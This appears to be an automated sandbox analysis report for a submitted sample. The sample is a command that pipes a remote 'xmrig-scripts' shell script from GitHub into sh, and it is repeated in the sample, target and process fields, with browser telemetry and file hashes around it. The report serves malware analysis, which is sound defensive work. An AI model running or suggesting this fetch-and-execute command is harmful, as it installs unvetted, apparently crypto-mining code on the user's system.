Analysis
-
max time kernel
46s -
max time network
47s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-07-2024 19:39
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://curl -fsSL https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/linux.sh | sh
Resource
win11-20240709-en
General
-
Target
http://curl -fsSL https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/linux.sh | sh
Malware Config
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2124 msedge.exe 2124 msedge.exe 2208 msedge.exe 2208 msedge.exe 4184 msedge.exe 4184 msedge.exe 1096 identity_helper.exe 1096 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe 2208 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2208 wrote to memory of 4816 2208 msedge.exe 81 PID 2208 wrote to memory of 4816 2208 msedge.exe 81 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2752 2208 msedge.exe 83 PID 2208 wrote to memory of 2124 2208 msedge.exe 84 PID 2208 wrote to memory of 2124 2208 msedge.exe 84 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85 PID 2208 wrote to memory of 124 2208 msedge.exe 85
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://curl -fsSL https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/linux.sh | sh1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa10a23cb8,0x7ffa10a23cc8,0x7ffa10a23cd82⤵PID:4816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:82⤵PID:124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:12⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:3672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:12⤵PID:4952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:12⤵PID:3364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:12⤵PID:4052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3948 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:12⤵PID:1652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:12⤵PID:3916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:5100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,15378963187709590281,10784745914957268497,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2108 /prefetch:12⤵PID:3880
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3312
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b0499f1feacbab5a863b23b1440161a5
SHA137a982ece8255b9e0baadb9c596112395caf9c12
SHA25641799b5bbdb95da6a57ae553b90de65b80264ca65406f11eea46bcb87a5882a7
SHA5124cf9a8547a1527b1df13905c2a206a6e24e706e0bc174550caeefabfc8c1c8a40030e8958680cd7d34e815873a7a173abe40c03780b1c4c2564382f1ceed9260
-
Filesize
152B
MD5f53eb880cad5acef8c91684b1a94eed6
SHA1afab2b1015fecbc986c1f4a8a6d27adff6f6fde9
SHA2565cb8554e763313f3d46766ab868f9d481e3644bfc037f7b8fe43d75d87405a27
SHA512d53f3965428f73c0dfed1d941a9ff06eb70b254732410b815bc759b8c7904e11292ad7e9624c12cccaed6763e7bea68208bc0b67fc70b7616d25bda143833794
-
Filesize
5KB
MD5c4295184b63469f777128a45a456d858
SHA17f28997e05cde732d076a288e8bd197082ae14a4
SHA25684383a393e0195fdffde7bff1ed319a57965812d4be8d3886331fd2fa7cf6f88
SHA512f48c70c004ec6f2666d8c50017246ddfeb3d9dea351a1909be4a4d1c56a2fede7e3225fd44678891deb3395a234c572941b478db04b69cc5802cd462b36703a4
-
Filesize
5KB
MD55a592134a350b3c44f9e2d2c534cb382
SHA1213b2d91db01f2e30d1746f7499e5baedbaf12ee
SHA2563915c9d91288e55b8dff4bd654815fc8f2a5696e9fe72c71f94a37f61f2c3098
SHA512fc78d6d9cf398c822adea7bf67de440d9047c037dba4ce18a98c667061799ea77cb336d266d67d5cb38417850dc61b266a3ecbcaf99bc07e305d5dd1f31ff877
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD501065159ff58b7f6c5b1eb3c7f414ff8
SHA10419fa8eb08d98b858daacd5c6c4d5a28cb3e15e
SHA256f0a4547265449eded31c1f720050cc5ee4d58c6e5dbb8a8d4ecd2702e2528bb7
SHA512bcda74dab2e9af730dc06c8027644b8e1dfc9aeb43687a7ab4f5370aa21a786c8731947beb51322f4e355f3cb444e0b1cad47983e120ccc6b74b0d3a35fcc00a